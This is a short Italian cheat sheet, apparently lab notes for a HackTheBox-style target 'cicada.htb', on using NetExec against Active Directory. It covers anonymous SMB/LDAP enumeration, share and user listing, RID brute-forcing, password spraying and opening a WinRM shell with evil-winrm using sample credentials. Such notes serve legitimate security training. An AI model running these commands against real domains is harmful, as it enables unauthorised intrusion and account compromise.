tags: NetExec nxc Hacking_Active_Directory
Tramite questo software è possibile enumerare e ottenere informazioni su una macchina che utilizza Active Directory, si può enumerare il servizio SMB, Ldap, ecc.
sudo apt install netexec
#Enumerazione SMB senza nome utente e password
nxc smb cicada.htb -u '' -p ''
#Enumerazione con password sbagliata che ci restituisce il nome utente
nxc smb cicada.htb -u '' -p 'ffafafafafa'
#Una volta trovato il nome utente possiamo enumerare le cartelle condivise
nxc smb cicada.htb -u 'Guest' -p '' --shares
#Se il nostro utente può enumerare gli altri utenti possiamo utilizzare
nxc smb cicada.htb -u 'Guest' -p '' --users
#Per fare un bruteforce degli utenti utilizzare il seguente comando:
nxc smb cicada.htb -u 'Guest' -p '' --rid-brute
#Se hai una lista di nomi utenti e una password puoi fare uno spraying attack
nxc smb cicada.htb -u 'users.txt' -p 'passwod123'
#Enumerazione Ldap senza nome utente e password
nxc ldap cicada.htb -u '' -p ''
#Se il nostro utente può enumerare gli altri utenti possiamo utilizzare
nxc ldap cicada.htb -u 'micael.spaadne' -p 'password12334' --users
#Enumerazione winrm senza nome utente e password
nxc winrm cicada.htb -u '' -p ''
#Se troviamo un utente possiamo verificare se sia possibile ottenere una shell su quel utente tramite winrm, se vediamo (Pwn3d!) significa che è possibile
nxc winrm cicada.htb -u 'emily.oscar' -p 'paninoapnie'
evil-winrm -i 10.10.1.1. -u 'emily.oscar' -p 'paninoapnie'